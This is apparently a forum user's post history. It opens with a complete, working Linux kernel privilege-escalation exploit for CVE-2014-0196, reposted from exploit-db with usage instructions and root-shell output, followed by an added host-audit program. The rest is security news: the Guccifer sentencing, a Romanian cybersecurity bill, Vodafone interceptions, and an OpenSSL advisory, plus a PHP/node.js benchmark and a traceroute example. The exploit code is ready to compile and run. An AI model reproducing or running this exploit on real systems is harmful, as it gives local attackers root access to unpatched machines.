Everything posted by Nytro
-
CVE-2014-0196: Linux kernel <= v3.15-rc4: raw mode PTY local echo race

/*
 * CVE-2014-0196: Linux kernel <= v3.15-rc4: raw mode PTY local echo race
 * condition
 *
 * Slightly-less-than-POC privilege escalation exploit
 * For kernels >= v3.14-rc1
 *
 * Matthew Daley <mattd@bugfuzz.com>
 *
 * Usage:
 *   $ gcc cve-2014-0196-md.c -lutil -lpthread
 *   $ ./a.out
 *   [+] Resolving symbols
 *   [+] Resolved commit_creds: 0xffffffff81056694
 *   [+] Resolved prepare_kernel_cred: 0xffffffff810568a7
 *   [+] Doing once-off allocations
 *   [+] Attempting to overflow into a tty_struct...............
 *   [+] Got it
 *   # id
 *   uid=0(root) gid=0(root) groups=0(root)
 *
 * WARNING: The overflow placement is still less-than-ideal; there is a 1/4
 * chance that the overflow will go off the end of a slab. This does not
 * necessarily lead to an immediate kernel crash, but you should be prepared
 * for the worst (i.e. kernel oopsing in a bad state). In theory this would be
 * avoidable by reading /proc/slabinfo on systems where it is still available
 * to unprivileged users.
 *
 * Caveat: The vulnerability should be exploitable all the way from
 * v2.6.31-rc3, however relevant changes to the TTY subsystem were made in
 * commit acc0f67f307f52f7aec1cffdc40a786c15dd21d9 ("tty: Halve flip buffer
 * GFP_ATOMIC memory consumption") that make exploitation simpler, which this
 * exploit relies on.
 *
 * Thanks to Jon Oberheide for his help on exploitation technique.
 */

#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <pthread.h>
#include <pty.h>
#include <stdio.h>
#include <string.h>
#include <termios.h>
#include <unistd.h>

#define TTY_MAGIC 0x5401

#define ONEOFF_ALLOCS 200
#define RUN_ALLOCS 30

struct device;
struct tty_driver;
struct tty_operations;

typedef struct {
    int counter;
} atomic_t;

struct kref {
    atomic_t refcount;
};

struct tty_struct_header {
    int magic;
    struct kref kref;
    struct device *dev;
    struct tty_driver *driver;
    const struct tty_operations *ops;
} overwrite;

typedef int __attribute__((regparm(3))) (* commit_creds_fn)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* prepare_kernel_cred_fn)(unsigned long cred);

int master_fd, slave_fd;
char buf[1024] = {0};
commit_creds_fn commit_creds;
prepare_kernel_cred_fn prepare_kernel_cred;

int payload(void) {
    commit_creds(prepare_kernel_cred(0));

    return 0;
}

unsigned long get_symbol(char *target_name) {
    FILE *f;
    unsigned long addr;
    char dummy;
    char name[256];
    int ret = 0;

    f = fopen("/proc/kallsyms", "r");
    if (f == NULL)
        return 0;

    while (ret != EOF) {
        ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, name);
        if (ret == 0) {
            fscanf(f, "%s\n", name);
            continue;
        }

        if (!strcmp(name, target_name)) {
            printf("[+] Resolved %s: %p\n", target_name, (void *)addr);

            fclose(f);
            return addr;
        }
    }

    printf("[-] Couldn't resolve \"%s\"\n", name);

    fclose(f);
    return 0;
}

void *overwrite_thread_fn(void *p) {
    write(slave_fd, buf, 511);

    write(slave_fd, buf, 1024 - 32 - (1 + 511 + 1));
    write(slave_fd, &overwrite, sizeof(overwrite));
}

int main() {
    char scratch[1024] = {0};
    void *tty_operations[64];
    int i, temp_fd_1, temp_fd_2;

    for (i = 0; i < 64; ++i)
        tty_operations[i] = payload;

    overwrite.magic = TTY_MAGIC;
    overwrite.kref.refcount.counter = 0x1337;
    overwrite.dev = (struct device *)scratch;
    overwrite.driver = (struct tty_driver *)scratch;
    overwrite.ops = (struct tty_operations *)tty_operations;

    puts("[+] Resolving symbols");

    commit_creds = (commit_creds_fn)get_symbol("commit_creds");
    prepare_kernel_cred = (prepare_kernel_cred_fn)get_symbol("prepare_kernel_cred");
    if (!commit_creds || !prepare_kernel_cred)
        return 1;

    puts("[+] Doing once-off allocations");

    for (i = 0; i < ONEOFF_ALLOCS; ++i)
        if (openpty(&temp_fd_1, &temp_fd_2, NULL, NULL, NULL) == -1) {
            puts("[-] pty creation failed");
            return 1;
        }

    printf("[+] Attempting to overflow into a tty_struct...");
    fflush(stdout);

    for (i = 0; ; ++i) {
        struct termios t;
        int fds[RUN_ALLOCS], fds2[RUN_ALLOCS], j;
        pthread_t overwrite_thread;

        if (!(i & 0xfff)) {
            putchar('.');
            fflush(stdout);
        }

        if (openpty(&master_fd, &slave_fd, NULL, NULL, NULL) == -1) {
            puts("\n[-] pty creation failed");
            return 1;
        }

        for (j = 0; j < RUN_ALLOCS; ++j)
            if (openpty(&fds[j], &fds2[j], NULL, NULL, NULL) == -1) {
                puts("\n[-] pty creation failed");
                return 1;
            }

        close(fds[RUN_ALLOCS / 2]);
        close(fds2[RUN_ALLOCS / 2]);

        write(slave_fd, buf, 1);

        tcgetattr(master_fd, &t);
        t.c_oflag &= ~OPOST;
        t.c_lflag |= ECHO;
        tcsetattr(master_fd, TCSANOW, &t);

        if (pthread_create(&overwrite_thread, NULL, overwrite_thread_fn, NULL)) {
            puts("\n[-] Overwrite thread creation failed");
            return 1;
        }
        write(master_fd, "A", 1);
        pthread_join(overwrite_thread, NULL);

        for (j = 0; j < RUN_ALLOCS; ++j) {
            if (j == RUN_ALLOCS / 2)
                continue;

            ioctl(fds[j], 0xdeadbeef);
            ioctl(fds2[j], 0xdeadbeef);

            close(fds[j]);
            close(fds2[j]);
        }

        ioctl(master_fd, 0xdeadbeef);
        ioctl(slave_fd, 0xdeadbeef);

        close(master_fd);
        close(slave_fd);

        if (!setresuid(0, 0, 0)) {
            setresgid(0, 0, 0);

            puts("\n[+] Got it :)");
            execl("/bin/bash", "/bin/bash", NULL);
        }
    }
}

Source: http://www.exploit-db.com/exploits/33516/
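The header comment above bounds the bug to kernels from v2.6.31-rc3 through v3.15-rc4 (this exploit to v3.14-rc1 and later), and the code depends on reading commit_creds and prepare_kernel_cred from /proc/kallsyms. The host audit below is an added example, not part of the original post or the exploit author's code: it classifies a kernel release string against those bounds and reports whether kallsyms gives the current user real addresses for those two symbols. All function and enum names are hypothetical, and the comparison is by version number only, so a vendor kernel carrying a backported fix still reports as in range and has to be checked against its changelog.

```c
/* Added example, not part of the exploit: audit a host for the two
 * preconditions visible in the exploit's header comment and code. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/utsname.h>

#define RC_FINAL 1000 /* a final release sorts after every -rcN of that version */
struct kver { int major, minor, patch, rc; };
enum exposure { KV_UNKNOWN = -1, KV_OUT_OF_RANGE, KV_IN_BUG_RANGE, KV_IN_POC_RANGE };

/* Parse "3.15.0-rc4", "v3.15-rc4", "2.6.31-rc3", "3.13.0-24-generic".
 * Returns 0 on success, -1 if the string does not start with major.minor. */
int parse_release(const char *s, struct kver *v)
{
    char *end;
    const char *rc;

    if (*s == 'v') s++;
    if (!isdigit((unsigned char)*s)) return -1;
    v->major = (int)strtol(s, &end, 10);
    if (*end != '.' || !isdigit((unsigned char)end[1])) return -1;
    v->minor = (int)strtol(end + 1, &end, 10);
    v->patch = 0;
    if (*end == '.' && isdigit((unsigned char)end[1]))
        v->patch = (int)strtol(end + 1, &end, 10);
    rc = strstr(end, "-rc");
    v->rc = (rc && isdigit((unsigned char)rc[3])) ? atoi(rc + 3) : RC_FINAL;
    return 0;
}

static int kver_cmp(const struct kver *a, const struct kver *b)
{
    int x[4] = { a->major, a->minor, a->patch, a->rc };
    int y[4] = { b->major, b->minor, b->patch, b->rc };
    for (int i = 0; i < 4; i++)
        if (x[i] != y[i]) return x[i] < y[i] ? -1 : 1;
    return 0;
}

/* Bounds are the ones stated in the exploit header; the comparison is by
 * version number only and cannot see vendor backports of the fix. */
enum exposure classify_release(const char *release)
{
    static const struct kver first = { 2, 6, 31, 3 }; /* v2.6.31-rc3 */
    static const struct kver poc   = { 3, 14, 0, 1 }; /* v3.14-rc1   */
    static const struct kver last  = { 3, 15, 0, 4 }; /* v3.15-rc4   */
    struct kver v;

    if (parse_release(release, &v) != 0) return KV_UNKNOWN;
    if (kver_cmp(&v, &first) < 0 || kver_cmp(&v, &last) > 0) return KV_OUT_OF_RANGE;
    return kver_cmp(&v, &poc) >= 0 ? KV_IN_POC_RANGE : KV_IN_BUG_RANGE;
}

/* 1 if the line gives a non-zero address for one of the two symbols the
 * exploit resolves, else 0 (other symbol, zeroed address, or junk). */
int kallsyms_line_exposes(const char *line)
{
    unsigned long long addr;
    char type, name[256];

    if (sscanf(line, "%llx %c %255s", &addr, &type, name) != 3) return 0;
    if (strcmp(name, "commit_creds") && strcmp(name, "prepare_kernel_cred")) return 0;
    return addr != 0;
}

/* 1 = real addresses readable by this user, 0 = hidden, -1 = unreadable. */
int kallsyms_exposed(const char *path)
{
    char line[512];
    int exposed = 0;
    FILE *f = fopen(path, "r");

    if (!f) return -1;
    while (!exposed && fgets(line, sizeof line, f))
        exposed = kallsyms_line_exposes(line);
    fclose(f);
    return exposed;
}

int main(void)
{
    static const char *label[] = { "outside the affected range",
        "inside the affected range", "inside the range this exploit targets" };
    struct utsname u;

    if (uname(&u) != 0) return 2;
    enum exposure e = classify_release(u.release);
    int k = kallsyms_exposed("/proc/kallsyms");
    printf("kernel %s: %s\n", u.release, e == KV_UNKNOWN ? "unparsed" : label[e]);
    printf("kallsyms: %s\n", k == 1 ? "addresses readable by this user"
                           : k == 0 ? "addresses hidden" : "not readable");
    return e > KV_OUT_OF_RANGE;
}
```

On kernels that support the kernel.kptr_restrict sysctl, setting it to 1 makes /proc/kallsyms show zeroed addresses to unprivileged users, which is the condition the second check reports as hidden.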
-
Teens politely inform bank they can crack all its ATMs
Nytro replied to sicilianul's topic in Stiri securitate
Yes, simple and efficient.
-
Simpler:

telnet route_server
traceroute ipaddress

nytro@pwn:~$ telnet route-server.gblx.net
Trying 67.17.81.28...
Connected to loop0.route-server.phx1.gblx.net.
Escape character is '^]'.
C
******************************* WARNING *******************************
This equipment is the property of Level 3 Communications. Unauthorized
access is strictly prohibited. Any unauthorized access or tampering with
this equipment will result in civil and/or criminal prosecution.
******************************* WARNING *******************************
route-server.phx1>traceroute 8.8.8.8
Type escape sequence to abort.
Tracing the route to google-public-dns-a.google.com (8.8.8.8)
  1 ge4-12-1000M.ar6.PHX1.gblx.net (67.16.148.37) 0 msec 0 msec 0 msec
  2 72.14.196.50 12 msec 8 msec 8 msec
  3 216.239.46.40 [AS 15169] 12 msec
    64.233.174.238 [AS 15169] 8 msec
    216.239.46.40 [AS 15169] 8 msec
  4 64.233.175.150 [AS 15169] [MPLS: Label 338423 Exp 4] 56 msec
    72.14.238.2 [AS 15169] [MPLS: Label 671714 Exp 4] 36 msec 40 msec
  5 72.14.239.159 [AS 15169] [MPLS: Label 452774 Exp 4] 36 msec
    72.14.239.155 [AS 15169] [MPLS: Label 522286 Exp 4] 40 msec
    72.14.239.160 [AS 15169] [MPLS: Label 518798 Exp 4] 36 msec
  6 64.233.174.131 [AS 15169] 40 msec
    216.239.48.167 [AS 15169] 36 msec
    64.233.174.129 [AS 15169] 40 msec
  7 * * *
  8 google-public-dns-a.google.com (8.8.8.8) [AS 15169] 36 msec 40 msec 36 msec
route-server.phx1>quit
Connection closed by foreign host.
-
PHP vs node.js: The REAL statistics

10 June, 2014
Prahlad Yeri

When it comes to web programming, I’ve always coded in ASP.NET or the LAMP technologies for most part of my life. Now, the new buzz in the city is node.js. It is a light-weight platform that runs javascript code on server-side and is said to improve performance by using async I/O.

The theory suggests that synchronous or blocking model of I/O works something like this:

I/O is typically the costliest part of a web transaction. When a request arrives to the apache web server, it passes it to PHP interpreter for scripting any dynamic contents. Now comes the tricky part – If the PHP script wants to read something from the disk/database or write to it, that is the slowest link in the chain. When you call PHP function file_get_contents(), the entire thread is blocked until the contents are retrieved! The server can’t do anything until your script gets the file contents. Consider what happens when multiples of simultaneous requests are issued by different users to your server? They get queued, because no thread is available to do the job since they are all blocked in I/O!

Here comes the unique selling-point of node.js. Since node.js implements async I/O in almost all its functions, the server thread in the above scenario is freed as soon as the file retrieval function (fs.readFile) is called. Then, once the I/O completes, node calls a function (passed earlier by fs.readFile) along with the data parameters. In the meantime, that valuable thread can be used for serving some other request.

So that's the theory about it anyway. But I’m not someone who just accepts any new fad in the town just because it is hype and everyone uses it. Nope, I want to get under the covers and verify it for myself. I wanted to see whether this theory holds in actual practice or not.
So I brought upon myself the job of writing two simple scripts for benchmarking this – one in PHP (hosted on apache2) and other in javascript (hosted on node.js). The test itself was very simple. The script would:

1. Accept the request.
2. Generate a random string of 108 kilobytes.
3. Write the string to a file on the disk.
4. Read the contents back from disk.
5. Return the string back on the response stream.

This is the first script, index.php:

<?php
//index.php
$s=""; //generate a random string of 108KB and a random filename
$fname = chr(rand(0,57)+65).chr(rand(0,57)+65).chr(rand(0,57)+65).chr(rand(0,57)+65).'.txt';
for($i=0;$i<108000;$i++)
{
    $n=rand(0,57)+65;
    $s = $s.chr($n);
}

//write s to a file
file_put_contents($fname,$s);
$result = file_get_contents($fname);
echo $result;

And here is the second script, server.js:

//server.js
var http = require('http');
var server = http.createServer(handler);

function handler(request, response) {
    //console.log('request received!');
    response.writeHead(200, {'Content-Type': 'text/plain'});

    // s, fname, i, n and result are declared with var so that concurrent
    // requests each get their own copy instead of sharing implicit globals
    var s=""; //generate a random string of 108KB and a random filename
    var fname = String.fromCharCode(Math.floor(65 + (Math.random()*(122-65)) )) +
        String.fromCharCode(Math.floor(65 + (Math.random()*(122-65)) )) +
        String.fromCharCode(Math.floor(65 + (Math.random()*(122-65)) )) +
        String.fromCharCode(Math.floor(65 + (Math.random()*(122-65)) )) + ".txt";

    for(var i=0;i<108000;i++)
    {
        var n=Math.floor(65 + (Math.random()*(122-65)) );
        s+=String.fromCharCode(n);
    }

    //write s to a file
    var fs = require('fs');
    fs.writeFile(fname, s, function(err, fd) {
        if (err) throw err;
        //console.log("The file was saved!");
        //read back from the file
        fs.readFile(fname, function (err, data) {
            if (err) throw err;
            var result = data;
            response.end(result);
        });
    }
    );
}

server.listen(8124);
console.log('Server running at http://127.0.0.1:8124/');

And then, I ran the apache benchmarking tool on both of them with 2000 requests (200 concurrent).
When I saw the time stats of the result, I was astounded:

#PHP:
Concurrency Level:      200
Time taken for tests:   574.796 seconds
Complete requests:      2000

#node.js:
Concurrency Level:      200
Time taken for tests:   41.887 seconds
Complete requests:      2000

The truth is out. node.js was faster than PHP by more than 14 times! These results are astonishing. It simply means that node.js IS going to be THE de-facto standard for writing performance driven apps in the upcoming future, there is no doubt about it!

Agreed that the nodejs ecosystem isn’t that widely developed yet, and most node modules for things like db connectivity, network access, utilities, etc. are actively being developed. But still, after seeing these results, it's a no-brainer. Any extra effort spent in developing node.js apps is more than worth it. PHP might be still having the “king of web” status, but with node.js in the town, I don’t see that status staying for very long!

Source: PHP vs node.js: The REAL statistics | Prahlad Yeri
-
No bumps. A warning for EVERY bump or useless post serving as a "bump" that I see.
-
Hacker Guccifer sentenced to seven years in prison, to be served

by Otilia Ciocan

The Bucharest Tribunal on Friday sentenced hacker Marcel Lazăr Lehel, known as Guccifer, to seven years in prison, to be served, for breaking into the e-mail accounts of SRI director George Maior, MEP Corina Crețu and several celebrities.

Marcel Lazăr Lehel was sentenced to three years in prison on each count for breaking into the e-mail accounts of SRI director George Maior and of MEP Corina Crețu. The court ordered the sentences merged and a one-year increase applied, so that hacker Guccifer was sentenced to four years in prison, to be served, in this case.

The court also noted that Marcel Lazăr Lehel had previously been sentenced, on 8 February 2012, by the Sector 3 Court, to a three-year suspended prison sentence for breaking into the e-mail accounts of several celebrities. The court therefore added the three-year sentence to the sentence in the case concerning the break-in to the e-mail accounts of George Maior and Corina Crețu, so the hacker is to serve a sentence of seven years in prison if the decision becomes final.

The Bucharest Tribunal stated that the 2012 decision of the Sector 3 Court is final because it was not appealed. The court also barred Lehel from several rights for a period of three years after the main sentence has been served.

By Friday's decision, the Bucharest Tribunal maintained the pre-trial detention of Marcel Lazăr Lehel, who has been in custody since 22 January. The court also ordered the confiscation of a laptop from Lehel. The judge took note that George Cristian Maior and Corina Crețu did not join the case as civil parties. The decision is not final and can be appealed at the Bucharest Court of Appeal.

Hacker Marcel Lazăr Lehel admitted, at the last hearing, that he broke into the e-mail accounts of SRI director George Maior, of MEP Corina Crețu and of several celebrities, and he was tried under the simplified procedure.

"I have admitted and I admit all the acts I am accused of. I request that the case be judged on the basis of the evidence gathered during the criminal investigation. I regret the acts I committed. (...) During this trial, the DIICOT prosecutors said that I was a danger to national security. I would say that this is about three private e-mail accounts that were taken over by me without any material damage or bodily harm. Probably everyone has had an account broken into at some point. I personally have had five accounts broken into and I did not go to DIICOT. The acts are nowhere near that serious. They are three personal accounts, by no means work accounts," Guccifer told the court at the hearing of 26 May.

On 18 March, hacker Marcel Lazăr Lehel was sent to trial for computer crimes, accused of breaking into the e-mail and Facebook accounts of several celebrities and the e-mail inboxes of SRI director George Maior.

Prosecutors of the Directorate for Investigating Organized Crime and Terrorism (DIICOT) - Central Structure ordered the indictment of defendant "L.M.L, alias «Guccifer»", held in pre-trial detention, for unauthorized access to a computer system by breaching security measures in order to obtain computer data, restricting access to computer data, unauthorized transfer of data from a computer system and violating the secrecy of correspondence, according to a statement sent to the MEDIAFAX agency.

"In this case there is a reasonable suspicion that, during 2013, on the basis of a single criminal resolution, defendant L.M.L (Marcel Lazăr Lehel, ed.) accessed, repeatedly and without authorization, by breaching security measures, the e-mail accounts belonging to public figures in Romania, in order to obtain the confidential data held in the mailboxes, after which he changed the authentication passwords, thereby restricting the rightful users' access to the computer data held in the mailboxes," DIICOT stated.

The hacker allegedly transferred the data from the compromised e-mail accounts to his own computer system without authorization and then disclosed the contents of the correspondence to the public, "fraudulent actions committed in order to violate privacy in the online environment and to denigrate the public image of the persons concerned".

Marcel Lazăr Lehel was caught on 22 January by DIICOT prosecutors, following a search of his home in Arad county. The man was placed in pre-trial detention on 23 January, following a decision of the Sector 5 Court.

Investigators said at the time that the hacker had broken into the Yahoo and Gmail inboxes of SRI chief George Maior, after which he allegedly sent him, at his e-mail address on the SRI server, a message containing a link to data extracted from the two personal e-mail inboxes.

Marcel Lazăr Lehel, who used the pseudonyms "Guccifer" and "Micul fum", allegedly accessed the e-mail and Facebook accounts of public figures including Colin Powell, members of the Bush and Rockefeller families and officials of the Obama administration.

On 8 February 2012, hacker "Micul fum" was sentenced to three years in prison, suspended, by the Sector 3 Court of Bucharest. Marcel Lazăr Lehel allegedly accessed illegally the e-mail accounts and the Facebook accounts belonging to employees of a media trust and to public figures, and later made public their private conversations and photographs.

On 19 August 2011, Marcel Lazăr Lehel was detained for committing 25 offences of unauthorized access to computer systems, 25 offences of unauthorized modification and restriction of access to computer data, 25 offences of unauthorized transfer of data from a computer system and 15 offences of violating the secrecy of correspondence.

The man was accused that, between October 2010 and July 2011, he accessed without authorization, by breaching security measures, the e-mail accounts and the associated Facebook accounts belonging to Dragoș Moștenescu, Corina Caragea, Laura Cosoi, Roxana Ivănescu, Rona Hartner, Iliviu Lesu, Daniela Aciu, Irina Reisler Căpitanu, Violeta Babliuc, Monica Barbu, Lenuța Aciu, Simona Rădulescu, Denisa Barboni, Bianca Drăgușanu, Cristian Pulhac, Ada Milea and Organizația de Tineret APDL, investigators said at the time.

As his method of operation, Lazăr Lehel allegedly restricted the rightful users' access to the computer systems and copied without authorization the information, photographs and private correspondence stored in the injured parties' accounts, DIICOT prosecutors established.

He later disclosed the contents of the correspondence to the public through the social network, posting on personal accounts created specifically for this purpose, "Micul fum" and "Thevem Theven", confidential information and data, namely photographs, electronic messages and other private conversations held by the injured parties on their social accounts and chat applications.

Those affected by the actions of "Guccifer" also include American actor Steve Martin, John Dean, former adviser to President Richard Nixon, actress Mariel Hemingway, three members of the House of Lords in the United Kingdom, Laura Manning Johnson, a former CIA analyst, George Roche, former Secretary of the Air Force, and the president of MetLife (an insurance company).

According to some of the people affected, the accounts were broken into from IP addresses in Greece and Russia, Thesmokinggun.com wrote.

Hacker "Guccifer" claimed, in February 2013, the hacking of e-mail accounts belonging to members of the Bush family, disclosing correspondence of a personal nature.

In August 2013, "Guccifer" posted on his Facebook page a link to an e-mail correspondence between former US Secretary of State Colin Powell and PSD MEP Corina Crețu.

"A traitor to the homeland," the hacker wrote on Powell's Facebook wall, attaching a link to a Google drive with e-mails received by Powell from Crețu in 2010-2011 through his AOL account. In these e-mails, Crețu calls Powell, a native of the Bronx, New York, "the love of my life" and suggests that she is writing about an older love story, according to TheSmokingGun.com.

The former US Secretary of State had to offer clarifications about his relationship with Corina Crețu following these revelations.

According to several publications, including The Daily Mail, Huffington Post, New York Daily News and the American television channel Fox News, the former general answered questions from the website The Smoking Gun.com, stating that he did not cheat on his wife - to whom he has been married for about 50 years - with Crețu, currently a PSD MEP, after e-mails "of a very personal nature" were made public.

Powell said that he met Crețu about ten years ago, while he was Secretary of State to former President George W. Bush and she was spokesperson for Romanian President Ion Iliescu. He stressed that they had met in person "once or twice" in the last eight years.

Source: Hackerul Guccifer, condamnat la șapte ani de închisoare cu executare - Mediafax
-
Romania's draft cybersecurity law: Internet and telephony providers must allow access to customer data to representatives of SRI, MApN, MAI, ORNISS, SIE, STS, SPP, CERT-RO and ANCOM 'at their reasoned request'

by Adrian Vasilache
Friday, 6 June 2014, 12:37

Holders of cyber infrastructures (author's note: all internet and telephony providers) must allow access to the data they hold, relevant in the context of the request, to representatives of the Romanian Intelligence Service, the Ministry of National Defence, the Ministry of Internal Affairs, the Office of the National Registry for State Secret Information, the Foreign Intelligence Service, the Special Telecommunications Service, the Protection and Guard Service, CERT-RO and ANCOM at their "reasoned request". The provision appears in the draft Law on the cybersecurity of Romania, initiated and adopted by the Government on 30 April and now being debated in Parliament.

The provision in the draft law was first flagged by jurist Bogdan Manolea on his blog: Drept & Internet - noutati si opinii.

Here is what Article 17 of this draft law provides:

Art. 17 - (1) In order to achieve cybersecurity, holders of cyber infrastructures have the following responsibilities:
a) to provide the necessary support, at the reasoned request of the Romanian Intelligence Service, the Ministry of National Defence, the Ministry of Internal Affairs, the Office of the National Registry for State Secret Information, the Foreign Intelligence Service, the Special Telecommunications Service, the Protection and Guard Service, CERT-RO and ANCOM, in the fulfilment of their duties, and to allow the representatives designated for this purpose access to the data held, relevant in the context of the request;

The draft law gives the following definition of cyber infrastructures:

cyber infrastructures - infrastructures in the field of information and communications technology, consisting of information systems, related applications, electronic communications networks and services;

The draft Law on the cybersecurity of Romania was adopted in the Government meeting of 30 April, the same day on which it was put up for public debate on the website of the Ministry for Information Society (MSI). The draft was registered at the Chamber of Deputies on 27 May 2014. The Committee for Defence, Public Order and National Security and the Committee for Information Technology and Communications had 3 June 2014 as their deadline for submitting amendments, and 10 June 2014 is their deadline for submitting the report.

According to the draft Law on the cybersecurity of Romania, holders of cyber infrastructures that are internet service providers are obliged to notify their customers, public and private legal persons, immediately in situations where the information systems used by those customers have been involved in cyber incidents or attacks, and to order the measures necessary to restore normal operating conditions. Failure to comply with this obligation is a contravention and will be punished with a fine of 500 to 5000 lei.

Private companies' expenses related to carrying out the provisions of this law will be tax deductible under the conditions and in the amount set by the Ministry of Public Finance.

For details on this draft, see also: UPDATE Romania's draft cybersecurity law: Internet service providers risk fines of up to 5000 lei if they do not immediately notify their customers in the event of cyber incidents or attacks

Source: Proiectul legii securitatii cibernetice a Romaniei: Furnizorii de internet si telefonie trebuie sa permita accesul la datele clientilor catre reprezentantii SRI, MApN, MAI, ORNISS, SIE, STS, SPP, CERT-RO si ANCOM 'la solicitarea motivata' a acesto
-
UK wants to imprison hackers for life

Life terms sought for hacks causing death, injury, or damage to national security.

by David Kravets - June 5 2014, 6:28pm GTBDT

The UK government is mulling life sentences for hackers whose attacks have catastrophic consequences.

The proposal, outlined in the Queen's speech Wednesday, would update the Computer Misuse Act and impose life terms for those convicted of "cyberattacks which result in loss of life, serious illness or injury or serious damage to national security, or a significant risk thereof."

The Guardian said the plan would also increase maximum sentences for industrial espionage from 10 to 14 years.

It's conceivable that a hacker in the US could get a life term, too, although no individual statute carries that penalty. The longest sentence ever given to a hacker in the US was 20 years—Albert Gonzalez was sentenced in 2010 in Boston after being convicted of leading a conspiracy that hijacked more than 90 million credit and debit card numbers from TJX and other retail outlets.

Source: UK wants to imprison hackers for life | Ars Technica
-
The damage Edward Snowden caused the NSA is smaller than estimated

by Luminița Bogdan

Former NSA consultant Edward Snowden does not appear to have taken quite as many documents from the US National Security Agency as was initially believed, according to the daily The Washington Post.

The damage is still significant, but "it seems he did not take as many" documents as was initially believed, said the director of the US intelligence services, James Clapper, quoted by The Washington Post.

Former NSA consultant Edward Snowden set off a worldwide scandal after giving the press tens of thousands of documents revealing the extent of the surveillance carried out by the US National Security Agency.

"We are about to verify, but we believe that many documents he consulted he was not able to download," Clapper said. "There are things we thought he had obtained and now it seems he did not obtain them," he added.

According to The Washington Post, this analysis contrasts with the initial catastrophic scenario outlined by the US intelligence community, which suggested that Snowden, since charged with espionage, "had compromised the communication networks that made up the military command and control systems".

One year after the first revelations in the British daily The Guardian, on 5 June 2013, details continue to emerge in this case. The daily The New York stated on Sunday, based on the documents provided by Snowden, that the NSA collects photographs of people in order to use them in facial recognition programs.

Source: The damage Edward Snowden caused the NSA is smaller than estimated - Mediafax
-
Vodafone REVEALS data about interceptions in certain states

by Marius Oncu - Mediafax

Vodafone on Friday revealed the existence of direct connections from government agencies to the group's networks, which allow conversations to be intercepted in some of the countries where it operates, but for Romania and a few other states it could not present information, as this is prohibited by law.

The connections of national government agencies are used on a large scale in many of the 29 countries that had access to the group's network over the past year, including on the basis of warrants, the group said, in a report that breaks the silence on the ever wider use by authorities of interceptions of telephone and data networks to spy on their own citizens, writes the British publication The Guardian.

The agencies have installed direct connections to the network of Vodafone and of other telecom operators, which allows them to listen to and record conversations live, and in some cases to locate people.

In Romania, Albania, Egypt, Hungary, India, Malta, Qatar, South Africa and Turkey it is forbidden to disclose any information related to the interception of phone calls and messages, including whether such capabilities exist.

"It is chilling that governments can access phone calls with the simple press of a button," said the director of the organisation Liberty, Shami Chakrabarti, quoted by the British daily.

In about six of the countries where Vodafone operates, the law obliges telecom operators to install direct access connections or to allow the authorities to do so. The group did not name the states, as some of them could respond with countermeasures including the arrest of employees.

Direct access systems do not require warrants, and the companies have no information about the identity or number of customers targeted. Mass surveillance can take place on any network, without the authorities having to justify themselves to the companies.

"These are the nightmare scenarios we were imagining. I would never have believed that telecom operators were complicit to such an extent. It is a brave step by Vodafone and we hope that other companies too will become braver about disclosures, but what we need is to be braver ourselves and to fight against illegal requests and even against the laws," said Gus Hosein, director of the organisation Privacy International, which has sued the British government over mass interceptions.

The head of Vodafone's division for personal information, Stephen Deadman, acknowledged the existence of the direct connections used by authorities for interceptions.

"We are calling for an end to direct access as a means for authorities to obtain data about the population's communications. Without a warrant, there is no external visibility. If we receive a request, we can try to oppose it. The fact that the authorities have to issue a piece of paper is an important limit on how this power is used," he said.

The British group called for all connections that provide direct access to be shut down, and for the laws that allow them to be repealed.

All countries should publish data on the number of warrants issued, according to Vodafone. These are of two types - those for the content of calls and messages, and those for metadata (data describing other data - editor's note), which can cover the location of a device's user, the time and date of the communication, as well as the persons with whom they communicated.

The daily The Guardian compiled a table in which it also included, under the metadata category, warrants for information such as names and addresses. The information is for 2013 or for the most recent year and includes data both from the Vodafone report and available from national authorities.

A single warrant can, however, target hundreds of people and devices, while a single person can be the target of several warrants.

According to The Guardian, Malta is one of the most spied-on countries in Europe. Vodafone processed 3,773 requests for metadata in a population of only 420,000 people.

In Italy, where the mafia's activities require a higher level of surveillance, the British group received 606,000 requests for metadata, more than in any other country. In Spain, where the authorities have had to fight attacks by Islamist and Basque terrorists, Vodafone received over 24,000 warrants for content.

Agencies in the Czech Republic sent almost 8,000 requests for content. After Italy, the Czech Republic is the country with the highest access to metadata, targeted by 196,000 warrants in the most recent year for which figures have been published.

Tanzania, one of the few African countries where Vodafone operates, issued 99,000 warrants for metadata.

The table compiled by the British daily notes for Romania: "It is illegal to disclose any aspect of how interceptions are carried out".

Source: Vodafone REVEALS data about interceptions in certain states. In Romania disclosure is prohibited - Mediafax
-
Digital Romania - signing an "I, the undersigned" statement for free WiFi and pre-pay SIM cards !?!

A five-article bill adopted by the Government of Romania on 30 April 2014, which requires mandatory registration of free WiFi users and of pre-pay SIM cards, passed through the Senate at supersonic speed, and in the Chamber of Deputies has 2-day deadlines for submitting amendments and the report. It shows us the true face of the digital Romania our rulers want: a virtual space in which you have to sign a statement for any use of communication technologies and in which (through the new draft law on cybersecurity) data is to be accessible directly and without a warrant to all the secret and non-secret services.

In a traditional style of public non-debate (the draft was NOT sent to civil society and industry before its adoption by the government, and none of the Senate committees was interested in other opinions) we risk seeing adopted some articles that are full of gaps and have no serious practical effect, other than limiting citizens' rights.

But let us analyse in more detail.

Full article: Digital Romania - signing an "I, the undersigned" statement for free WiFi and pre-pay SIM cards !?!
-
OpenSSL Security Advisory [05 Jun 2014]
========================================

SSL/TLS MITM vulnerability (CVE-2014-0224)
===========================================

An attacker using a carefully crafted handshake can force the use of weak
keying material in OpenSSL SSL/TLS clients and servers. This can be exploited
by a Man-in-the-middle (MITM) attack where the attacker can decrypt and
modify traffic from the attacked client and server.

The attack can only be performed between a vulnerable client *and*
server. OpenSSL clients are vulnerable in all versions of OpenSSL. Servers
are only known to be vulnerable in OpenSSL 1.0.1 and 1.0.2-beta1. Users
of OpenSSL servers earlier than 1.0.1 are advised to upgrade as a precaution.

OpenSSL 0.9.8 SSL/TLS users (client and/or server) should upgrade to 0.9.8za.
OpenSSL 1.0.0 SSL/TLS users (client and/or server) should upgrade to 1.0.0m.
OpenSSL 1.0.1 SSL/TLS users (client and/or server) should upgrade to 1.0.1h.

Thanks to KIKUCHI Masashi (Lepidum Co. Ltd.) for discovering and
researching this issue. This issue was reported to OpenSSL on 1st May
2014 via JPCERT/CC.

